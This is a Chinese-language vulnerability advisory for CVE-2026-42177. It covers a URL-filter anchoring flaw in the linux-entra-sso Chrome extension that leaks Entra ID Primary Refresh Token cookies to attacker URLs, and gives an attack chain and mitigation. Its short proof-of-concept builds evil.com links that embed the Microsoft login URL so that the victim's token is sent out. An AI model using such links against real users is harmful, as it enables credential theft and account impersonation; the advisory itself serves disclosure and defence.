IPBUF安全漏洞报告
English
CVE-2026-42177 CVSS 5.3 中危

CVE-2026-42177 linux-entra-sso PRT信息泄露漏洞

披露日期: 2026-05-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42177
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
linux-entra-sso

相关标签

信息泄露浏览器插件SSOCVE-2026-42177linux-entra-sso

漏洞概述

linux-entra-sso是用于Linux连接Microsoft Entra ID的浏览器插件。在1.8.1版本之前,该插件的Chrome适配器存在安全漏洞。由于URL过滤器未正确使用锚点且缺少严格的前缀检查,当用户访问攻击者精心构造的恶意URL时,插件会将Entra ID主刷新令牌(PRT)Cookie错误地附加到请求中,导致敏感令牌泄露给攻击者。

技术细节

该漏洞的核心在于Chrome扩展程序的规则配置错误。在受影响版本中,`platform/chrome/js/platform-chrome.js` 注册了一个 `declarativeNetRequest` 规则,其 `urlFilter` 设置为 `https://login.microsoftonline.com/*`。然而,由于缺少 `|` 或 `||` 锚点,Chrome将该规则视为子字符串匹配,而非路径前缀匹配。与Firefox适配器不同,Chrome版本未执行 `startsWith` 校验。结合 `manifest.json` 中声明的广泛宿主权限 `optional_host_permissions: ["https://*/*"]`,攻击者可诱导用户访问路径中嵌入目标字符串的URL(例如 `https://attacker.com/fake/https://login.microsoftonline.com/`)。此时,Chrome规则匹配成功,触发 `modifyHeaders` 动作,将敏感的PRT Cookie注入到发往攻击者服务器的请求头中,导致身份验证令牌失窃。

攻击链分析

STEP 1
1. 诱导访问
攻击者诱导已安装 vulnerable linux-entra-sso 插件的用户点击特制的恶意链接。
STEP 2
2. 规则匹配
用户浏览器发起导航请求。由于恶意URL路径中包含 'https://login.microsoftonline.com/' 子字符串,插件的 declarativeNetRequest 规则被错误触发。
STEP 3
3. 注入令牌
插件执行 modifyHeaders 动作,将 Entra ID 的 Primary Refresh Token (PRT) Cookie 自动注入到发往攻击者服务器的 HTTP 请求头中。
STEP 4
4. 窃取凭证
攻击者服务器接收到包含 PRT Cookie 的请求,从而获取了用户的身份验证令牌,可用于后续的身份冒充。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC Concept: Attacker sets up a page to trigger the leak --> <!-- This is a simulation of the attack vector --> <script> // The attacker crafts a URL where the path contains the target string const maliciousUrl = "https://evil.com/redirect_to/https://login.microsoftonline.com/"; // When the victim navigates to this URL (e.g., via a link), // the vulnerable extension detects the substring match. // The extension then appends the PRT cookie to the request sent to evil.com. console.log("Simulating navigation to: " + maliciousUrl); // In a real scenario, window.location.href = maliciousUrl; </script> <!-- HTML Body --> <h1>CVE-2026-42177 PoC Simulation</h1> <p>Click <a href="https://evil.com/xyz/https://login.microsoftonline.com/">here</a> to trigger PRT leak if vulnerable extension is installed.</p>

影响范围

linux-entra-sso < 1.8.1

防御指南

临时缓解措施
建议用户立即升级插件到最新版本。如果无法立即升级,应暂时禁用该插件或避免点击来源不明的链接,以防被诱导至恶意网址。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表